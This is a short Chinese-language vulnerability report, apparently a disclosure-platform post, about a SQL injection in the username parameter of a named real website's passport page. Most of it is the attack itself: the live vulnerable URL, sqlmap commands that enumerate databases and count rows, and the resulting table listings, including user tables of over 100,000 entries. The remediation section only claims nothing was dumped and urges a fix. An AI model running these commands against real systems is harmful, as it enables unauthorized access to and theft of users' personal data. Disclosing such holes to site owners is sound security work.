网界网分站SQL注入(十几万用户数据)
注入点:
http://passport.cnw.com.cn/findusername.php?username=crtest1
其中,username参数存在SQL注入漏洞。 sqlmap.py -u "http://passport.cnw.com.cn/findusername.php?username=crtest1" --dbs --current-user --current-db
sqlmap.py -u "http://passport.cnw.com.cn/findusername.php?username=crtest1" --count
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| userauditlogs | 264429 |
| users | 128142 |
| users2 | 127382 |
| laiyuan | 30618 |
| bjjt_login | 20666 |
| xdd_answer | 19526 |
| bjjt_dc | 14017 |
| sg_qdetial | 13698 |
| rel_usermail | 9077 |
| rel_usermail_20131206 | 8858 |
| sg_role | 4055 |
| t4 | 2862 |
| bjjt_reg | 1643 |
| urlvisitrecords | 1332 |
| intel121112 | 819 |
| bjjt1 | 649 |
| t3 | 275 |
| t1 | 184 |
| unsub_fb | 162 |
| sg1 | 138 |
| informatica | 101 |
| rel_othermail | 54 |
| sg_que | 45 |
| wy_industry | 35 |
| wy_duty | 20 |
| sg_roleitem | 18 |
| bjjtcourse | 15 |
| murlinfos | 12 |
| mailtypes | 10 |
| wy_companysize | 7 |
| wy_Turnover | 7 |
| sg_final_fight | 6 |
| wy_Pcsize | 6 |
| wy_serversize | 6 |
| bjjtcoursecate | 2 |
| bjjtadmin | 1 |
| sg_num | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 959 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| TABLES | 76 |
| STATISTICS | 69 |
| KEY_COLUMN_USAGE | 54 |
| TABLE_CONSTRAINTS | 54 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 30 |
| SCHEMATA | 4 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: ccw_passport
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| users | 19 |
+---------------------------------------+---------+
Database: cnwprojects
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| answer2 | 9665739 |
| answer | 32107 |
| users | 3573 |
| 20090609_cisco | 2055 |
| 20090605_ibm | 867 |
| news_content | 461 |
| 20090424_juniper | 447 |
| 20090311_symantec_records | 403 |
| 20090608_arrayamp | 235 |
| 20090309_symantec | 97 |
| question | 97 |
| newsletter | 26 |
| 20090506_novell | 15 |
| manswer | 13 |
| project | 12 |
| fuzeren | 8 |
| mquestion | 6 |
| meeting | 5 |
| musers | 2 |
+---------------------------------------+---------+
修复方案:
安全测试,绝对没有拖库,赶快修复吧,我不敢保证其他黑帽黑客不去干坏事,毕竟我不是黑客大牛,无法帮你做到安全兼备啊